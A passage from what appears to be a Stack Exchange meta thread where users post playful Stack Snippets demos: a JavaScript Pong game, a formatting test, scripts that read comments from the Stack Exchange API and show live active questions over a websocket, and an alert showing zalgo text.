function makePad(pad, step, y, maxmojo)
{
 pad.y = y;
 pad.mojo = 0;
 pad.step = step;
 pad.yOffset = (pad.offsetHeight / 2) + (ball.height / 2);
 pad.maxmojo = maxmojo;

 pad.move = function(y)
 {
  var ny = y - this.yOffset;

  if(ny + this.offsetHeight > document.documentElement.offsetHeight)
   ny = document.documentElement.offsetHeight - this.offsetHeight;
  if(ny < 0) ny = 0;

  this.mojo = ny + this.yOffset - this.y;

  if(this.mojo > this.maxmojo) {
   ny -= (this.mojo - this.maxmojo);
   this.mojo = ny + this.yOffset - this.y;
  }
  if(this.mojo < -this.maxmojo) {
   ny += (-this.mojo - this.maxmojo);
   this.mojo = ny + this.yOffset - this.y;
  }

  this.y = ny + this.yOffset;

  this.style.top = ny + "px";
 }

 pad.mojomove = function(y)
 {
  if( this.mojo >= 0) {
   if (this.y + this.mojo + 5 < y) {
    this.move(this.y + this.mojo + 5);
   } else if(this.y + this.mojo - 6 > y) {
    this.move(this.y + this.mojo - 6);
   } else {
    this.move(y);
   }
  } else {
   if (this.y + this.mojo - 5 > y) {
    this.move(this.y + this.mojo - 5);
   } else if(this.y + this.mojo - 6 < y) {
    this.move(this.y + this.mojo + 6);
   } else {
    this.move(y);
   }
  }
 }

 return pad;
}

function leftStep()
{
 if(ball.speedX <= 0) {
  this.mojomove(ball.y);
 } else {
  this.move(this.y + this.mojo);

  if(this.mojo < 0) { this.mojo++; }
  if(this.mojo > 0) { this.mojo--; }
 }
}

function rightStep()
{
 if(ball.speedX >= 0) {
  this.mojomove(ball.y);
 } else {
  this.move(this.y + this.mojo);

  if(this.mojo < 0) { this.mojo++; }
  if(this.mojo > 0) { this.mojo--; }
 }
}

function step()
{
 ball.step();

 rpad.step();
 lpad.step();

 window.setTimeout(step,35);
}

window.onload = function()
{
 ball = makeBall(30,50,14,10);
 lpad = makePad(document.getElementById("leftPad"), leftStep, 30, 25);
 rpad = makePad(document.getElementById("rightPad"), rightStep, 30, 25);

 step();
}
```

```css
html, body {
 height:100%;
 padding: 0px;
 margin: 0px;
   background-color: black;
}

html {
 overflow: hidden;
 border:none;
}

body {
 background-repeat:no-repeat;
 background-attachment:fixed;
 background-position:0px 0px;
}

a {
 font:8pt/11pt Verdana,Arial,Helvetica,sans-serif;
}

#ball {
 position:absolute;
 width:10px;
 height:7px;
 top:82px;
 left:30px;
 color:red;
 font-family:Tahoma;
 font-size:16pt;
 cursor:default;
}

#leftPad, #rightPad {
 position:absolute;
 background-color:yellow;
 width:4px;
 height:20px;
 border:1px solid black;
}

#leftPad {
 left:2px;
 top:50px;
}

#rightPad {
 right:2px;
 top:50px;
}
```

```html
<div id="leftPad"></div>
<div id="rightPad"></div>
<div id="ball">&bull;</div>
```

Comment: Hah! Nice! This is awesome.

Answer (score 4):

I already reported [Hidden Stack Snippets gets the code formatting when inserted next to code](https://meta.stackoverflow.com/q/272126/1461424), but I want to check if this happens to snippets that are not hidden as well.

```
var code_block = null;

<p>Ta Da!</p>
```

Yup!

Answer (score 4):

jsfiddle vs stack-snippets

```js
var comments = [],
  i = document.createElement("i"),
  n = 0,
  ln;

function loopComments() {
  if (n >= ln) n = 0;
  var comment = comments[n++];
  i.innerHTML = comment.body;
  console.log("%s: %s", comment.owner.display_name, i.textContent);
  setTimeout(loopComments, Math.max(Math.random() * 3000, 100));
};

var questionCommentsXHR = new XMLHttpRequest();

questionCommentsXHR.open("get", "http://api.stackexchange.com/2.2/questions/302280/comments?order=asc&sort=creation&site=meta.stackoverflow.com&filter=withbody");

questionCommentsXHR.onreadystatechange = function() {

  if (questionCommentsXHR.readyState !== 4) return;

  Array.prototype.push.apply(comments, JSON.parse(questionCommentsXHR.response).items);

  var questionAnswersXHR = new XMLHttpRequest();

  questionAnswersXHR.open("get", "https://api.stackexchange.com/2.2/questions/302280/answers?order=desc&sort=activity&site=meta.stackoverflow.com");

  questionAnswersXHR.onreadystatechange = function() {

    if (questionAnswersXHR.readyState !== 4) return;

    var answerIds = JSON.parse(questionAnswersXHR.response).items.map(function(item) {
      return item.answer_id;
    });

    if (!answerIds.length) {

      ln = comments.length;

      loopComments();

    } else {

      var answerCommentsXHR = new XMLHttpRequest();

      answerCommentsXHR.open("get", "https://api.stackexchange.com/2.2/answers/" + answerIds + "/comments?order=desc&sort=creation&site=meta.stackoverflow.com&filter=withbody");

      answerCommentsXHR.onreadystatechange = function() {

        if (answerCommentsXHR.readyState !== 4) return;

        Array.prototype.push.apply(comments, JSON.parse(answerCommentsXHR.response).items);

        ln = comments.length;

        loopComments();
      };

      answerCommentsXHR.send();
    }
  };

  questionAnswersXHR.send();
};
questionCommentsXHR.send();
```

```html
<!-- results pane console output; see http://meta.stackexchange.com/a/242491 -->
<script src="http://gh-canon.github.io/stack-snippet-console/console.min.js"></script>
```

Answer (score 4):

**Get live active StackExchange posts using StackExchange websockets.**
Note: you need to wait a bit for an active question.

```js
var ws = new WebSocket("wss://qa.sockets.stackexchange.com/")
ws.onmessage = (function(data){
let data1 = JSON.parse(data.data)
let data12 = JSON.parse(data1.data)
document.getElementById("title").innerHTML = "<a href=\'" + data12.url + "\'>" + data12.titleEncodedFancy + "</a>"
document.getElementById("askedBy").innerHTML = "Asked by: <a href=\'" + data12.ownerUrl + "\'>" + data12.ownerDisplayName + "</a>"
document.getElementById("askedBy").innerHTML = "Site: <a href=\'https://" + data12.siteBaseHostAddress + "\'>" + data12.apiSiteParameter + " (" + data12.siteBaseHostAddress + ")</a>"
document.getElementById("content").innerHTML = data12.bodySummary
document.getElementById("tags").innerHTML = "Tags: " + data12.tags
})
ws.onopen = (function(){
ws.send("155-questions-active")
})
```

```css
h1, h2, span, p {font-family: sans-serif}
```

```html
<h1>StackExchange Active Questions</h1>
<div id="feed"><h2 id="title"></h2>
<span id="askedBy"></span><br>
<span id="site"></span><br>
<span id="tags"></span>
<p id="content"></p></div>
```

Answer (score 4):

An attempt to alert insane zalgo text. Click <kbd>edit</kbd> below to see the full mess!

```js
alert('ψ ψ̶̨̨̢̡̢̧̢̨̨̛̛͈̟̲̪̮̲͍͉͖̝̼̝̲̫̤̙̰̯͍͕̼̳̟̹̬̬̼̻̣͕̹̳̰̝̭͎̫̳̻̼̜̟̖̻̣̠̼̹͖͓̼̤̩͈̗̦͉̺͇̻̌͐͛̈́̈́͛̊̓͊̀͋́̊͗̄͑̽͂̌̈̿̽͛̓̚̚̕͜͝͝͝͝͝͝͠͝ ̵̨̢̡̡̨̧̡̧̨̢̡̧̧̢̨̛̖͔͈̠̟̘̦̗̠̦̭̤̞̭̰͈̲͇͈͙̗̬̫̪̟̠͚̥̖̳͔̟̯͉̫̩̟̪͔̣̭̗̙̞̭͈̭̥͉̩̯͈̮͖̱͙̳̠̯̭̳̪̟̝̯̻̘͍͚͇̜͕̼̝̦̻͔̩̙̬͖̯͉̼̭̺͙̳̜̖̣̹̳̜͕̰̮̦̞̹̲̙̝͔̱̘͖̥̺̙̙͖͎̺̜̭̺̫͚̼̜̬͙̲̹͇̮̠̰͕̗̱͇̬͍͈̯̞͎͇̺̣͓̮̟̝͓̝͎̖̺̪͎͙̼̯̞̘̠̫͍̄͐̌̍͛́̄̍͆͛͑̌͌̐̐͊̃͌́͐̄͌̏̊̏͒̒̉̍̇̏̀͗͑̌̑̎͗̇̇̒̅̄͒̑̈̍̽͗̇̕̚͘̚̕̚̚̕͜͜͜͜͜͜͜͝͠͝ͅͅͅͅͅS̴̡̡̨̡̢̨̧̡̧̡̨̡̨̧̢̧̧̨̢̨̧̡̡̛̛̛̛̛̛̛̛͕̖͓̥̲̤̰͙̯̲͎̟̝̭̰̖̻̩̥̝͎̗͚̰̼̮̝̺̥̳̜̭̰̯̫̤̳̥̭̫̦̤̠̦̭͚̗̣͉͙̣͖̯̩͖͇̘̼̥͈̼̙͙͙̳͓͓̲̰͈̙̳̳͇̫͖̤͍̦̞̲͎̖͓̟̭̟̜̹̞̞͍̟̟̟̺͔̹͇̻͇͇̦̹͍̣̦͉̼͕͙̱̙̮̮͓͚̯̬̬͓͇̯̤͉̝̞͕̭̘͉̠̞̗̜̝͇̗̞͚̜̬̭̞̣̱̞̗̟̺͈̦͙̼͚̦͈̣͎̠͇̬͕̰͕͚̱͙̼̣̤̠̙͚͈̯͇͈̱̮̜͙̳̻̠̮̝̝̫̺̝͈͉̖̗̞͔͕̝͙͍̙̹̦̞̫̣̖̫͖̺̼̭̙̭̙̯͓͎̘̜̼̰̘̰̭̹͕̖̰̥̪̲̦͙̲̯͕̋̒̄̈́̎̓̂̾̿̓̈̅͐͑̎́͂̀̑̉͐͛̈́͗̈̈́̔͆̊̓̏́́̄͌̊̇̍͑̎̐̆̈͌̍͌̎́̉̒̐̇͆͒͂́̈́̀͗̉̈́̌̐̎͒̆̓̀̃͊̋̍̒̅̊̿̾̃̃̃͌͒̏̾̓̋̀̓̂̈͛̊͗̈́̍̊̽͂͒̑͋̃̊́̔̓̄̈́̄́͌̑̐̓̑̓͑̈́̇͊̑͐͊͛́̌͂͗̀̔̈́̐͗̏̋̍̃͐͌̈́͛̽̆̇̾̿̎̾̔̈́̎͑̃̅̉̓̉̎̒͂̌͌̊̅̍̌͌̇̀̇̈́̃́̋̂̅͋̌͒̈̑̿̉́̊̑͛̑̈́̋͑̿̏̀͛͗̏̄͐̓͌̈̃̽̈͊̅͊́͛̇̈́̈̚͘͘̚͘̚̕̕̕̕̕̕̕͘̕̕͘͘̚͘̚̕͜͜͜͜͜͜͜͝͠͝͝͝͠͝͝͝͠͝͝͝͝͝͠͝͝ͅͅͅͅͅͅͅo̴̡̡̡̧̧̡̧̢̢̢̨̡̢̡̨̧̡̧̧̢̨͇̱͍̺̞͓͙̺͓̞͔͈͈͎͍͓̳͖̙̖͕͚͈̘̺̻͍̺͈͎͚͕̜̜̙̟͙̮̪̖͉̮̤̰̯̹͕̘̗͙͙̳̗̼̣̙̗̩͚͕̬̫̞̮͉̙̳̻̹͓̝̱̼̼̩͇̗͍̪̤̲̰̱̟̭̟͔͖̝̟͉̱̙̞͍͎̣̣̙̱͇̦͙͎̩̻̪͙̗͚̣͔̜̲̝͖̤̠͍̮̲͔̠͉̺̭͚͇͇̼̙̥͇̜̖̫̙͓̺̻̰̼̘̘̺̫͈̟̞̫͖̙͕̬̱̟̱͔̥̝̗̲̻̳͓̺̗̭̝̺̮̳̻͍̳̘̪͎͖̠̟͎̺̭̩̯͍͙̜͔̣̮̘̫̬͖̙̝̤͚̭͖̠̖̻͈̩̦̺̘̤̊̒̑͂̈́̽̐̎͜͜͜͜͜͜͝ͅͅͅͅͅͅͅm̶̧̢̡̧̧̨̡̧̧̧̧̨̡̨̛̛̛̛̛̛̛̛̛̼̭̯̻̭̯͕͚̯͙̯̗͉̜̞͈͓̫̘̯͙͔̫̰̩̯̼̝̙͔̬̺͓͙̦̞̪͇̯̪̻̲͙̥̭̣̳͕̝̹̼̩͙̦̝̜̯͖͚̩̘̗͉͍̟̠̩̞͓̼̺̥̱̩͈̱̗͖̥̗̟͕̭̗̩͚̲̪͚̥̯͉̜͍͎̭̮̱͓͍̙͉̝̖̜̣̩̼̥̥̙̰̙̖̣̣͍̞͚͚̞͙̙͕͖̦̖͎̻̫̤͍̖̦̦̥͎̝̺̤̼͉̪̞̺̻͖̺̬̮̺͍̙̥͇͈̬̫̭̼̠͉̤͉͇̪͔͙̹̤̫̖͍̝̼̟̮̼̮̜̺̺͔͙͉̜̥̦̟̮̩͖̥͈̞̰̼͉̠͚̰͕͇̮͍͖̤̳̜̯̻͖̜̥͇̯̬͈͚̬͍̘̥̞̮̝͚̭̳͉͎̦͎̘̮͙̞̟̟̜͓̥͛̂͐̀̎̓̃̈́̌́͆̉̊̈́̎͗̄͆̀̽́̈̌̐̊̀̍͂̽̋̇̍̉̈́͆̏̉͆͑̿͛̒̔̀̓̆́̈́̓̔̇̈́̃̋̌̀͗͆̒̑́̓̏̔̏̒͛̀̀̏̈̇̈̾͊̇̈̾͆̍̔̔͊̄̅̃̂̊͛́͛͂̽͑͑̀̄̓͊̀̃̃͛̓͑̈́͊́̈̀̿̔̒̌̌͐̎̐̈́̾̌̒͒̾̂̊̌̉̀̒̓͛̈́́͑̊͛̂́̈́͗̿̉͒̃̑̾͑̈́͆̅̃͑̉͆̐͆͂̀̄̃̋̿̎̀͐̈́͌͑̌́̓̑̓̏̒͆͊͌̏̉͋͒̓̕̕̕̕̕͘͘͘̕̕͘̕͘̚͘̕͘̚͜͜͜͜͜͜͝͝͝͝͠͠͝͠͝͝͠͝͠͝͝͝͝͝͝͝͠͠ͅͅͅͅͅȩ̷̧̛̛̛̝͙̬̻͖̹̠̞̪̯̘̭̤̠̣̙̫͕̮͔̯͙̫̪͈̹͖͚̹̼͖̫̖̥͇̳̩̲͓͐̾͗̾̉͋̈́͐̋́͐̂́̔̉̏͌̾̽͑̑̇͂̃̇̏̑̿̑̓̒͗̾́͑̊̀̏̂̂̽͊̂̓͊̃́̂̋͋́͒̒͗̏̔̂͊͛̑͒̆̂̍́̌̇̔̏̇̿̀̆̇̅̾͋͂̒̉͂̐̏̂͑̋̅̑̄̓̋̌͛͒̆̆̇̆̀̍̐̊͊̾̔̀̇̓̎͒̏̐̀̉̓̏̔̇̆̈̀̇̄͆̿͑̐̀̀̎̎͊̌̊̓͒̈́̂͆͆̂̈́́̔̂̀̿͌̅̃́̃͆̈̎̎̍͌̓̿͋́͌́̂̉̀̇̇͛̾͗̿̅̄̕̕̚͘̕̕̕̚̕͘͘͘̕̕̕͝͠͠͝͝͠͠͠͝͠͠͝͠͝͝͝͠ ̴̧̡̢̧̧̢̛̛̛̛̛̛̛̛͙̦̼͙͙̘͔̞̝̳̜͚̱̘̝̳̙̹̺̗̜͖̹̠͉̫̤͓̳̯̻̙̭̦̗͔̤͈͖̣̮͍͉̬̼̜̤̝̦͔̯͔͕̩͙̰̗̙̫̙͔̠̭̯͍͔͇̭̰̹̳̘͍͓̫̩̼̮̬̥̥̼͚̣̰̱̟̮͔͎̞̖̘̜͖͇͚͕͈̞̙̦̠̲̹̹͚̱̟̠̩͈̩̺̻͓͔͙̤̬͕͈̠̫͈͇̮̩͍̫̙̞̦̠̼̠̥̙͕͙̜̪̺̘͈̳̼̣̘̰̺̠̬͓̯̠̪͎̬̲̺̱͉̪̦̱͎͔̘̝͇̜̱̫̟̜̙̗̪̰͓͚̱̪̅̍͗̅͌̀̿̒̿̉͑̈́̓̊̈́̈̏̈́͂̀̍̒̓̈́͌̃̉̿͆͆̓͒̉͗̈́͑̀̂̀̀̎̉̋͌̋̀́͒̊̀̊̋͋͆̃͗͛̽͊͆͋̈́̅͒̌̈̉̔͑̂̊́̓̃͑̅̑̔̓͂̋̌̀̌̓̊̊̈́̈́̈̓̂̓͊̄̾̊̎̆͂̈̀̊̇̌̾̈́́͐͗̀̒̎̎́̏̄̆̃̅̈́̓̎̉̑͗͑͑̔͌̆̍͐̅̃̈́̔̅̀̇̅̂͒̈́͆͗̈̄͊́͆̇͒̈́̇̓̅͑͋̍̇̈́͋͛̈́̋͂̃͋̈́́̈́̆͑̎̓̑̂̀̋̏̉͆̾̒̏͛́̆́̈́̔̊͑̒̄͛͐͌͋̓̽́̅̆̏̇͛̇͒̍̄͒̆͗̓́̎̒͑̾͌̅̊̕͘͘̚̕͘̚̚̚̚̚̚̚͜͜͜͠͠͠͝͝͠͠͝͝͝͠͝͝͠͝͝ͅͅͅͅͅz̷̧̨̛̛̛̛̛̛̛̛̛͕̦͈̬͈̝͓̭̦̭͎͕͍̠͔͉͍͖̱̼͉̞̮̥͇͈̱̪͕͙̥̼̗̓̅̂̈́͋͒̀̌̋̂̓̊̉̽̀͊̆͌͛̓̌̉͂̒̑̀͊͂͑̉͒͆̌̌̌͆̈́̒͛͊̈́͗̈́̆͛̓͊̃̈́̔̈́̐̏̆́̒͐̈́͂͒̈́͂̿̽̊̀̐͌̿͆̀́̌́̄͋͛͆̂͂̐̀̈́̉͊͑͒̀͌̊̄̆̆̊̿̄̋̉̌͐̽̿̈́͒̔̀̃̓͂̔̈̂̄̉̈̿̈̉̍̇̽͗́̏̑̽̈́̊̂̈͑͂̓̋͆̆͗̆̀̎̉͆͒́̏͐͊̍͋̈̿̔͂͑͊̓̑̐͆͑̈́͛͊̈́̊͐͗̍͑̐͑̇̆͊̒̀̾̍̀̈́̒̍̂̈́̀͐͗̕̚͘͘̕̕͘̕͘͘̕̕̕͘̚͘̕͘̚͘͜͜͝͠͠͝͝͠͝͝͝͝͠͠͠͝͝͝͠͝͝͠͝ͅả̶̡̨̡̨̨̨̛̛̛̛̛̫̗̤̯͚̦̜̖̗̖̪̩̥̩̟̤̖̖̪̝̝̹̫̱̺̱͙̖̱̖̟͖̹̜̬̖̖̝̤̭͓͔̬͍̳̦̺̬͉̱̺͈̺͙̤͕̹̜̙̫̩̗̩͉̫̗͚̙̯͇̥̰̫͉̦͎͓̬̀͛̌̈́̈́̔̓͌̿̌͒̂̓͒̈̌̊̐̈́̈́͗̃̽͑̔̿̉̈́̋͒͒̓̓̋̿̿̄̉̓̅͐̈́̿́͐́̈̀̀͗́̇̓̽̅̌̀̾̓̾̾̇̑̄̏̈̈́̃͛̑̓̅̐̈̈́̓̈́̄͒̐̇͒̉̂̈͂͐̂̆̆̂͂͗́̏͊̊̎̀͑̃̏̏̀̾̉̓̅͊́̈̑͂̍̔̀̎͊͗̐̂̂̒͛̓̀̀̈́͂̚̕͘̚̚̚͘͘̕͜͜͝͝͠͠͠͝͠͝͝͠͠͠ͅl̵̢̡̨̧̧̡̡̛̛̛̛̛̛͙̹̹̱̯̱͔̥̩̬͎͇̳͇̺̬̲̪͇͕̱͈̮̝͎͇̤̘̥̖̰̮͍̘̲̫͙̜̣̜̮̙̫͇͍͈̱͍͇̼̰͈͈͖̠͚͇̲̞̣̩͈͍̘͖̱̜͊͒͌̋̓̽̉͊̏̎̾̓͒͑̈͗̂̀̊̑̂̈̄͐̄̾̓̇̄͂̍̏̔̈́̈́́̎̓̎͊̈́̽̌̔̎̍̾͑̽̀̀́̏͛̾̈́̅̈́̾̐͛̅͌̽̏̂̎͒͊̈̓̓͌̉͆̑͒̎̊̑̎̎̾̓̾̓̄͌̀̍͂͑͊́̇͋̉͂͊̐̌̑̄̒͐̓͂̀̈́̋̅̓̀̆̒̾̐̂̄́̄͐́͗̀͂̾͋̔̆̉̒̓̍͛̃͒̑̐͆̏̆͋͆͐̈́͒̿͛̓̅̄́̈́̀͌̔͋̔̒̄̂̇̏̀̈̆̈́̉͛́̐͊̓̔̋̊͂̈́̒̇̀́̌̅̋̀̂̆̑̀̽͐̈́̃̇̓̈̅͒̕̚̕̕̕̚̕͘͘̕̕̕̕̕̕̚͘͠͠͝͝͝͝͠͠͠͝͠͝͝͝͝ͅĝ̴̢̡̛̛̛̛̛̛̠̞̱̰̰͙̯̦̤͚̬͉̘̝̠̝̖̰͎̬̲͍̥͎̤͈̯͉͓̦͚̊̿͂̅̏̇̔͆̀̈́̊͛̈́̃̾̇̌̎̌̅̌́̄̑͒̏͊́̂̈̍͌̀̋͂̄̔̊͋̓̿̆͆̀͒̉̔̉̂͌̊̌̎̄̒͂̂́̈́̆̽͋̽̆̔̍̾̍͒̊́͌̐̉̀̄̄̀̑̀̇̾̊̓̌̓̈́͒́̑͌̾̎̑͒̓̾̈́̈̂͗̊̓̈́͂̔̐͐͂̌̌͛͛͆̓̐̾̈̎́̂́͌̔̈́̈́̇̏̄͑̇͑̏̒͌́͌̓̽̍͆̿͒͛̋̌̉̽̽̀̉͂̈́̅̄͆̏̽͋̓͑̏̇͆̓͒̽́̀͋̉͒̊͌̈́̈́͛̅̒̓͌̆́̈́̾͑͊̿̔̓͒̚͘͘͘̚̕̚͘̕̚͘̚̚̕̚̕͜͠͝͠͝͝͝͠͝͝͝͠͝͠͝͝͝͝͝͝ơ̷̢̢̧̛̛̛̳͙̻̫̠̗̥̣̤͍̣̮̳̳̮̼̄͆̒̑̀͗̏̑́͋̓̒̅̀̊͒͌̑̄̑̇̇̎̔̃́̎̀̅̓̒́̐̔̾̃̍̀́͑͌̐̒̈́̐͛̐̾̽̆̐̇̃̂̏̍̍̅͒͐̄͂͐̏̌͆͛͗̇̏͆͒͛̏͊͂̐̃̂̓̐̉̾̿̒̍̒͑͆̏̈́̍̄̓͗̑͂͂́̔̏̈́͐̈̑̒̐̽̄͊̓̔̋̑̑̔̈̒̄́̒̑̈́̍̉̾̈́̾̈̌̊̿́̾͌̔̋̈́̓́̋̏̅͐̈̅͆̈̏͆͊͆̽͆͒͊̍͆͆͌̍͋͊̒̄̒͌̏̊͑̇͆̅͑̂̋̍̑́̿̂̄͐̓͑̏̑͊̈́̈́̎͂͌͐̎͆̊̽̀̽̌͐͗̓̉͒̔̽̈́̚̕͘̕̚̕̚̚̕̕͘͘̚̕͘͘͘͜͝͠͝͝͝͝͠͠͝͝͠͠͝͝͝͝ ̸̡̧̧̡̡̢̢̡̧̢̨̡̡̨̢̨̡̛̟̳͈̱̻̹̮̭̖͔͕̝̮͚͔̣̫̫̣͕̞̥̮̠̹͍͎̱̭̻̪̪̪͎͎̻̜͕̮̥͉͖̗̯̩̪̹̺̮̼̠͈̪͕̳̤̲̼͖͎̯̭͕̙̪͓̮̩͙̠̜̝̮̹̤͎͖̙͈̬̖̻̼̖̖̜̫̖̻͖̩̻͈̪͈̪͎͖̼̠̟̦̹͓̭̥͉̬̱̮͈̬̰̗͍̣̪̻͈͓͍̟̻̳̳͔̠̙̱̣̫͙̝͓̣̞̤̼̖̞͇̳̱̤̖̥̳͕̣̟͎̞̭̘͉̦̦̳̮̹͉͕̗̟͈͙̟̘͓̙̥͓̥̰̮̫̘̣͇͓͍̠̳͉̭̯̤̯͔̥̲̼̞̃̆̈́̋͑͌̈̋̆̑͊͌̓̾͊̈́̈́̏̀̏̎̍̄̿̾̀̍̉̇̀̄̆͐̀̈̅̐̊͊̒̅̌͒̂̀̒̏̎̔͛̽̀͒̿̐̈́́̌͛͊̍̊͒͛͑͋̎̾̑̊̉̋̂̎̈́̂̈́̂̏͂̒̌͑̇̽̈́̅̉̄́̅͊͑͛̈͗͐͛̃̀̈́̃́̏̇̀͂̀̒̅͌͐̏̋͗̾̆̉͑̃̿̐̈́̀̌̈̿̊̎̈́̀̒͋͋̈́̈́̿̋̓̀̾̄͊́̈́̈́̄̎̎̂̍́͑̆̇̌͐̓͒́̆͒͆̀̏̈̿͊̏́͌͛̆̅̌̒̅̾̂̿̉͌͊̎͘͘̕͘̕͘͘̕̚͘͘̕͘̕͘͜͜͜͝͝͝͝͝͝͝͝͠ͅͅͅṫ̶̡̧̡̢̧̡̢̧̨̢̢̨̢̡̛̛̛͇͇̭̰̞͉̞̟̪͍̟̝̦̼̮͔̖͉̹̫̥̼̠̯̪̩͎̤̠̭̠̗̫̦͉͙̘̻͙̲̺̳̬̹̲͎͍͉̗͍̙͉͓̮̟̣̣̺͍̳̼̗̮̠̙̙̯̫̰̱͎̳̥͉͕̼̘̱̼͙̯͓̤̮̪̯̹͎̝͉̩̫͕̙̝͈̼̬̞̞̟͍̬̳̤̹̬͉͔͇̩̙͚̤̦̤̩̖̺̺͙̯̠͖̠̦̟̰̖͎̤̪̬̟̤͉̱̤̯͔͕̝̩͓̳̲͖͇̤̙̤̰͓̙̰͚̹͉̲̭̈́͆̏́̈́̎͛̉̒͐̓̓̈͒̐̍̈́̀̽̆̈͒̓͒͑̾̋̽͑̏̿͗͋̍́̾̀̏̿͋̃̄̑͒͐̿͋̑̾̃̇̒̌̇͂̔̈́̒̄̀̍̍̈́̌̈́͗̐́͊͂͊͆̓͌̄͊̊̈́͐͊̉̄̂̌͂̒͂͒̿̏̽͐͗̆͛̒̏̓̃̐̀́͛̿̔̚̕͘̕̕͘̚͜͜͝͠͝͠͠͝͝͠͝ͅͅͅͅe̸̢̢̡̡̨̡̡̡̨̡̧̡̡̧̡̛̛̛̳͍̱̗͓̞̮͕͚͚̬̣͇̺̘̫̻̻͉̩͙̜̤͙̦̳͔̳̙͖̝̘̗̼̟̗̦͇̝͎̬͍̫̖̮͓̦̹̫̟͓̘̱͔̞͎̱̬̺͉̘̘͚̦͔̰̹͉̯̤̘̠̟̦̲̝̻͖͖̲͎͈̞͓̪͎̰̲͕̦̹͕͔̮̣͈̗̹̤̘̝͈̪͈̻͉̞̺͈͍̩̘̼̘͈̙̬̯̜̳̻̻̩̳̤̮̯͈̭̰͐̑̀̾̔̎̅̉̀̏̋̆͂͆̃̋̉͂͋͑̊͛́̿͐̀̓̊͒̅̈́̆̓͂̒̍͂͑̎̑̆͆̒̌͐͗̏̄͋̽̈́͆̎͛̐̋̏̂̓̏͒̂͐̊̃̅̂̿̾̈́̐̾̎̍͒͌̕͘̚̕͘̚͜͜͜͜͜͜͝͝͠͝͝͝͠ͅͅͅx̴̢̢̢̢̨̢̨̡̢̢̨̨̨̢̨̡̨̡̨̢̨̛̛̛̛͓̮̰͕̹̝͕͔͓̳͖̥̻̣͖̞̥̦̹̤̠͇̞̫̗͎̖͎̲̩̦̳͎̳̠͓̳͍̝͈͓̺̤̹͙͇̟͎̩̼͓̣̭̮̟̮̪̞̲̘̼̘̙̬͇͎̼͚͓̗̬̰̜̪̖̯̬̻̗͕̤̮͙̠̦̩͔̙̤̠͓͉̟̲̭̦̘̹͉̝̰̹̬̠͚͉͓̺̩̹̥̜̟̼̜̲̺͇̭̩̫͍̭͓̤͉̥̮͙̺͚̼͔̘͉͔̯͔̪͇̯͕͈̩̯̟͇̩̠̻̙̳̠̙͍̞̫͔̺̩̹̭̞̤͙͕̖̳͔̹̮͓̝͗̃̓͂̈́̀̆̊̐̊̓̈́͊̓̈̄͌͒̈́̊̋̑̍̀́̍̈́͛̑̊̍͑̓̄͊̈̿͋̌̂̿̒̓̋͒̊̓͂̿́̇͌̀́̄̓̔̄̂̈́̓̾͂̔͋͑̃̍͒̊̉̈́̋̂̓͑̈́̏͑͌͛̏̑̈̿̔͛̐̉́̿̌͑͒͋͌̓́͑̐͛͂̓͗̅̉̆̒͛̒͛̓̿͐̆̽̈́̓́̅̊̆́̄̾̀̉͆͑̓̓̀̀̒̆͂̉͆͛͆̎̿̏͐̀͆̈́̄͂̏̇̉̾͌̾̐̓̿͊͛̒̓̊̀̄̂̇̽̒̓̀̎̍̂̈̆̏̄͒͆͌̎̊̆̓̕͘̚̕̚͘̕̚̚͘͘̕̚̕͘͜͜͜͜͠͝͝͠͝͠͠͝͠͠͠͝ͅͅͅͅͅͅt̶̢̡̡̢̨̧̢̢̨̡̢̧̢̡̢̧̛̛͙̞̗̹̞̯̞̜̗͍̠͕̞̘͍̝̮͔̥̤̥̜͕̙̪͖̖͔̳̠̩̭͈̘͔̣̦͍̟̤̦̱̲͍̝̥͈̝̜̗̹̙̫̖̘̣̰̣̰͖̳̮̖̭̳̺͓͈̻̫̺̘̬̫̹͈̤̥͉͓͍̞̖͕̜̞͙̦͕̼̱̺̜̟̭̹͍͔̪̮͉̪͈̠̬̜̺͕͕̺̩̝͚͓̩͚̫̳̬̗͓̦̙̤̝̺̺̠́͛̊͋́̈́́͑̄̀̒̒͌̑͒̍̋̈́̆͂̏͆̉̊̆͋̍̏̍̔̒̽̂̌̾̂̃̇̀́̆̉̐̋̀͋́̃̍͂̆̿̃͑̓̊̿́̆̆̋̉́͛̓̊̉̑̓͑̋̑͛̽̽͋̋̈́͋͛͆͒͛̐͛͐̒̓̀̌̆̌̓̀̑͂̈́̇̊͋̾͊̋̑͛̄͑̿̏̇̿̊̒̑̒̿̀́͑͂͗̾̈̏̍̿̌̐̀͗̿͆͋̈́͑̽̂̽̐̓̀̿̾̍̉̉̈́͆͂̽͌͂̏̆̓̀̌͐͐̑̓͆̎̓͌͛̑̓̂̄̃̃͌̆̉̊͛̍̒̋̽͂̉̂̽̾̍̏̕̕̚̕̕̕͘̕̚̕͘͜͜͜͜͜͜͜͜͝͝͝͝͠͠͝͝͝͝͝͠͠͝͝ͅͅ.̵̧̡̢̡̢̨̢̨̢̨̢̡̡̧̡̢̨̨̡̢̧̡̢̡̢̧̢̢̧̡̨̡̨̡̡̡̛͙̦̝̺͉̖̟̺͍̳̻̠͈̭̘̖̰̼͓̳̥̩̟͉̰̜͚͇̼͚͚̼̻̩̣̺̬̗͖͍̘̗̬̼̣̞̫̜̤̤̺̖͔͉͎̘͚̥̹̺̯͖͓̫̤͇̱̮̲̠̫͔̣̗̜̗͕̖͖̺̮̳̫̜̞̼̮̟͙̙͈̰͈̭̪͖͇̟̳̖̭̭̩̟̘̺͍̝̭̦͈͈͔͓̼̻̗̺̪̱͔̲͚̟̰̪̣̯̤̺̳̳̱̣̟̠̹̱̝͉̠͈̜̱͉̘͎̪̭̭͖͓͍̝̠̫͈̙͓̝̙͖̙̜̹̥͖̜̳̣͓̰̥͖̗̣͕̙̱͍̗̻̬͇̺̝͓͈͖̠͈̭͈̝͖̺̞̖̯̟̭͙͉̲̤͈̠̪͇̫̘͓̳̥̲̤̭̯̠̣̦̺̲̠̮̖̺̫̙͛̈́̅̓̓̎̀́͊́̎̎̔̍͆̾̄̆̏̐͌̽̄͘͘͜͜͜͠͝͠͝͠ͅͅͅͅͅ 